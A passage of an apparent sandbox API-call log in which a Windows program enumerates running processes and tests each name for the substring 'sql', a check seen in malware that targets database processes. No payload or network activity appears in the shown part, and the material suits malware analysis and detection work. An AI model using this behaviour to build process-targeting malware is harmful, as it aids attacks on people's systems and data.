lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 18 [0140.802] lstrcpyA (in: lpString1=0x567fabc, lpString2="RuntimeBroker.exe" | out: lpString1="RuntimeBroker.exe") returned="RuntimeBroker.exe" [0140.802] StrStrIA (lpFirst="RuntimeBroker.exe", lpSrch="sql") returned 0x0 [0140.802] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0140.803] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0140.804] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x35838c0 [0140.804] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x35838c0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 13 [0140.804] lstrcpyA (in: lpString1=0x567fabc, lpString2="WmiPrvSE.exe" | out: lpString1="WmiPrvSE.exe") returned="WmiPrvSE.exe" [0140.804] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="sql") returned 0x0 [0140.804] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="pending.exe")) returned 1 [0140.805] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pending.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0140.805] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3583710 [0140.805] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pending.exe", cchWideChar=-1, lpMultiByteStr=0x3583710, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pending.exe", lpUsedDefaultChar=0x0) returned 12 [0140.805] lstrcpyA (in: lpString1=0x567fabc, lpString2="pending.exe" | out: lpString1="pending.exe") returned="pending.exe" [0140.805] StrStrIA (lpFirst="pending.exe", lpSrch="sql") returned 0x0 [0140.805] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="appointmentimpressed.exe")) returned 1 [0140.807] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="appointmentimpressed.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0140.807] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0x3585a30 [0140.807] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="appointmentimpressed.exe", cchWideChar=-1, lpMultiByteStr=0x3585a30, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="appointmentimpressed.exe", lpUsedDefaultChar=0x0) returned 25 [0140.807] lstrcpyA (in: lpString1=0x567fabc, lpString2="appointmentimpressed.exe" | out: lpString1="appointmentimpressed.exe") returned="appointmentimpressed.exe" [0140.807] StrStrIA (lpFirst="appointmentimpressed.exe", lpSrch="sql") returned 0x0 [0140.807] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="swing prefer.exe")) returned 1 [0140.808] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="swing prefer.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0140.808] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x3596888 [0140.808] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="swing prefer.exe", cchWideChar=-1, lpMultiByteStr=0x3596888, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="swing prefer.exe", lpUsedDefaultChar=0x0) returned 17 [0140.808] lstrcpyA (in: lpString1=0x567fabc, lpString2="swing prefer.exe" | out: lpString1="swing prefer.exe") returned="swing prefer.exe" [0140.808] StrStrIA (lpFirst="swing prefer.exe", lpSrch="sql") returned 0x0 [0140.808] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x384, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="vietnamese_mature_hat.exe")) returned 1 [0140.810] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="vietnamese_mature_hat.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0140.810] LocalAlloc (uFlags=0x40, uBytes=0x1a) returned 0x3585c38 [0140.810] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="vietnamese_mature_hat.exe", cchWideChar=-1, lpMultiByteStr=0x3585c38, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="vietnamese_mature_hat.exe", lpUsedDefaultChar=0x0) returned 26 [0140.811] lstrcpyA (in: lpString1=0x567fabc, lpString2="vietnamese_mature_hat.exe" | out: lpString1="vietnamese_mature_hat.exe") returned="vietnamese_mature_hat.exe" [0140.811] StrStrIA (lpFirst="vietnamese_mature_hat.exe", lpSrch="sql") returned 0x0 [0140.811] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="nights-attending.exe")) returned 1 [0140.812] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="nights-attending.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0140.813] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x35966a8 [0140.813] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="nights-attending.exe", cchWideChar=-1, lpMultiByteStr=0x35966a8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="nights-attending.exe", lpUsedDefaultChar=0x0) returned 21 [0140.813] lstrcpyA (in: lpString1=0x567fabc, lpString2="nights-attending.exe" | out: lpString1="nights-attending.exe") returned="nights-attending.exe" [0140.813] StrStrIA (lpFirst="nights-attending.exe", lpSrch="sql") returned 0x0 [0140.813] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x51c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="installed.exe")) returned 1 [0140.815] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="installed.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0140.815] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3583650 [0140.815] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="installed.exe", cchWideChar=-1, lpMultiByteStr=0x3583650, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="installed.exe", lpUsedDefaultChar=0x0) returned 14 [0140.815] lstrcpyA (in: lpString1=0x567fabc, lpString2="installed.exe" | out: lpString1="installed.exe") returned="installed.exe" [0140.815] StrStrIA (lpFirst="installed.exe", lpSrch="sql") returned 0x0 [0140.815] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x794, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="references compounds.exe")) returned 1 [0140.817] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="references compounds.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0140.817] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0x3585a58 [0140.817] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="references compounds.exe", cchWideChar=-1, lpMultiByteStr=0x3585a58, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="references compounds.exe", lpUsedDefaultChar=0x0) returned 25 [0140.817] lstrcpyA (in: lpString1=0x567fabc, lpString2="references compounds.exe" | out: lpString1="references compounds.exe") returned="references compounds.exe" [0140.817] StrStrIA (lpFirst="references compounds.exe", lpSrch="sql") returned 0x0 [0140.817] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="albuquerque_left.exe")) returned 1 [0140.819] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="albuquerque_left.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0140.819] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x35969c8 [0140.819] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="albuquerque_left.exe", cchWideChar=-1, lpMultiByteStr=0x35969c8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="albuquerque_left.exe", lpUsedDefaultChar=0x0) returned 21 [0140.819] lstrcpyA (in: lpString1=0x567fabc, lpString2="albuquerque_left.exe" | out: lpString1="albuquerque_left.exe") returned="albuquerque_left.exe" [0140.819] StrStrIA (lpFirst="albuquerque_left.exe", lpSrch="sql") returned 0x0 [0140.819] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="registered try.exe")) returned 1 [0140.821] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="registered try.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0140.821] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x35969e8 [0140.821] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="registered try.exe", cchWideChar=-1, lpMultiByteStr=0x35969e8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="registered try.exe", lpUsedDefaultChar=0x0) returned 19 [0140.822] lstrcpyA (in: lpString1=0x567fabc, lpString2="registered try.exe" | out: lpString1="registered try.exe") returned="registered try.exe" [0140.822] StrStrIA (lpFirst="registered try.exe", lpSrch="sql") returned 0x0 [0140.822] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="consultancy statute ide.exe")) returned 1 [0140.824] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="consultancy statute ide.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0140.824] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x35859e0 [0140.824] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="consultancy statute ide.exe", cchWideChar=-1, lpMultiByteStr=0x35859e0, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="consultancy statute ide.exe", lpUsedDefaultChar=0x0) returned 28 [0140.824] lstrcpyA (in: lpString1=0x567fabc, lpString2="consultancy statute ide.exe" | out: lpString1="consultancy statute ide.exe") returned="consultancy statute ide.exe" [0140.825] StrStrIA (lpFirst="consultancy statute ide.exe", lpSrch="sql") returned 0x0 [0140.825] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x67c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="invite.exe")) returned 1 [0140.827] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="invite.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0140.827] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x35838d8 [0140.827] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="invite.exe", cchWideChar=-1, lpMultiByteStr=0x35838d8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="invite.exe", lpUsedDefaultChar=0x0) returned 11 [0140.827] lstrcpyA (in: lpString1=0x567fabc, lpString2="invite.exe" | out: lpString1="invite.exe") returned="invite.exe" [0140.827] StrStrIA (lpFirst="invite.exe", lpSrch="sql") returned 0x0 [0140.827] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="idol.exe")) returned 1 [0140.829] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="idol.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0140.829] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3583800 [0140.829] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="idol.exe", cchWideChar=-1, lpMultiByteStr=0x3583800, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="idol.exe", lpUsedDefaultChar=0x0) returned 9 [0140.829] lstrcpyA (in: lpString1=0x567fabc, lpString2="idol.exe" | out: lpString1="idol.exe") returned="idol.exe" [0140.829] StrStrIA (lpFirst="idol.exe", lpSrch="sql") returned 0x0 [0140.829] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="latitude qualifications.exe")) returned 1 [0140.831] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="latitude qualifications.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0140.831] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x3585a08 [0140.831] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="latitude qualifications.exe", cchWideChar=-1, lpMultiByteStr=0x3585a08, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="latitude qualifications.exe", lpUsedDefaultChar=0x0) returned 28 [0140.831] lstrcpyA (in: lpString1=0x567fabc, lpString2="latitude qualifications.exe" | out: lpString1="latitude qualifications.exe") returned="latitude qualifications.exe" [0140.832] StrStrIA (lpFirst="latitude qualifications.exe", lpSrch="sql") returned 0x0 [0140.832] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="lauderdaletransmittedwasher.exe")) returned 1 [0140.834] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lauderdaletransmittedwasher.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0140.834] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x3585a80 [0140.834] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lauderdaletransmittedwasher.exe", cchWideChar=-1, lpMultiByteStr=0x3585a80, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lauderdaletransmittedwasher.exe", lpUsedDefaultChar=0x0) returned 32 [0140.834] lstrcpyA (in: lpString1=0x567fabc, lpString2="lauderdaletransmittedwasher.exe" | out: lpString1="lauderdaletransmittedwasher.exe") returned="lauderdaletransmittedwasher.exe" [0140.834] StrStrIA (lpFirst="lauderdaletransmittedwasher.exe", lpSrch="sql") returned 0x0 [0140.834] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="powell_jane.exe")) returned 1 [0140.836] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="powell_jane.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0140.836] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x35837d0 [0140.836] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="powell_jane.exe", cchWideChar=-1, lpMultiByteStr=0x35837d0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="powell_jane.exe", lpUsedDefaultChar=0x0) returned 16 [0140.836] lstrcpyA (in: lpString1=0x567fabc, lpString2="powell_jane.exe" | out: lpString1="powell_jane.exe") returned="powell_jane.exe" [0140.836] StrStrIA (lpFirst="powell_jane.exe", lpSrch="sql") returned 0x0 [0140.836] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="laboratorysaving.exe")) returned 1 [0140.899] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="laboratorysaving.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0140.899] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x3596828 [0140.899] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="laboratorysaving.exe", cchWideChar=-1, lpMultiByteStr=0x3596828, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="laboratorysaving.exe", lpUsedDefaultChar=0x0) returned 21 [0140.899] lstrcpyA (in: lpString1=0x567fabc, lpString2="laboratorysaving.exe" | out: lpString1="laboratorysaving.exe") returned="laboratorysaving.exe" [0140.899] StrStrIA (lpFirst="laboratorysaving.exe", lpSrch="sql") returned 0x0 [0140.900] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x798, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="gainedshape.exe")) returned 1 [0140.902] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gainedshape.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0140.902] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x3583698 [0140.902] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gainedshape.exe", cchWideChar=-1, lpMultiByteStr=0x3583698, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gainedshape.exe", lpUsedDefaultChar=0x0) returned 16 [0140.902] lstrcpyA (in: lpString1=0x567fabc, lpString2="gainedshape.exe" | out: lpString1="gainedshape.exe") returned="gainedshape.exe" [0140.902] StrStrIA (lpFirst="gainedshape.exe", lpSrch="sql") returned 0x0 [0140.902] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="opens-versions.exe")) returned 1 [0140.905] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="opens-versions.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0140.905] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x35966c8 [0140.905] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="opens-versions.exe", cchWideChar=-1, lpMultiByteStr=0x35966c8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="opens-versions.exe", lpUsedDefaultChar=0x0) returned 19 [0140.905] lstrcpyA (in: lpString1=0x567fabc, lpString2="opens-versions.exe" | out: lpString1="opens-versions.exe") returned="opens-versions.exe" [0140.905] StrStrIA (lpFirst="opens-versions.exe", lpSrch="sql") returned 0x0 [0140.905] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xddc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="workers_dedicated_alloy.exe")) returned 1 [0140.907] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="workers_dedicated_alloy.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0140.907] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x3585bc0 [0140.907] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="workers_dedicated_alloy.exe", cchWideChar=-1, lpMultiByteStr=0x3585bc0, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="workers_dedicated_alloy.exe", lpUsedDefaultChar=0x0) returned 28 [0140.907] lstrcpyA (in: lpString1=0x567fabc, lpString2="workers_dedicated_alloy.exe" | out: lpString1="workers_dedicated_alloy.exe") returned="workers_dedicated_alloy.exe" [0140.907] StrStrIA (lpFirst="workers_dedicated_alloy.exe", lpSrch="sql") returned 0x0 [0140.907] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x29c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0140.909] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="3dftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0140.909] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x35837a0 [0140.909] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="3dftp.exe", cchWideChar=-1, lpMultiByteStr=0x35837a0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="3dftp.exe", lpUsedDefaultChar=0x0) returned 10 [0140.909] lstrcpyA (in: lpString1=0x567fabc, lpString2="3dftp.exe" | out: lpString1="3dftp.exe") returned="3dftp.exe" [0140.909] StrStrIA (lpFirst="3dftp.exe", lpSrch="sql") returned 0x0 [0140.910] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x888, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0140.912] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="absolutetelnet.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0140.912] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x3596928 [0140.912] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="absolutetelnet.exe", cchWideChar=-1, lpMultiByteStr=0x3596928, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="absolutetelnet.exe", lpUsedDefaultChar=0x0) returned 19 [0140.912] lstrcpyA (in: lpString1=0x567fabc, lpString2="absolutetelnet.exe" | out: lpString1="absolutetelnet.exe") returned="absolutetelnet.exe" [0140.912] StrStrIA (lpFirst="absolutetelnet.exe", lpSrch="sql") returned 0x0 [0140.912] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x564, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0140.914] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="alftp.exe", cchWideChar=-1, 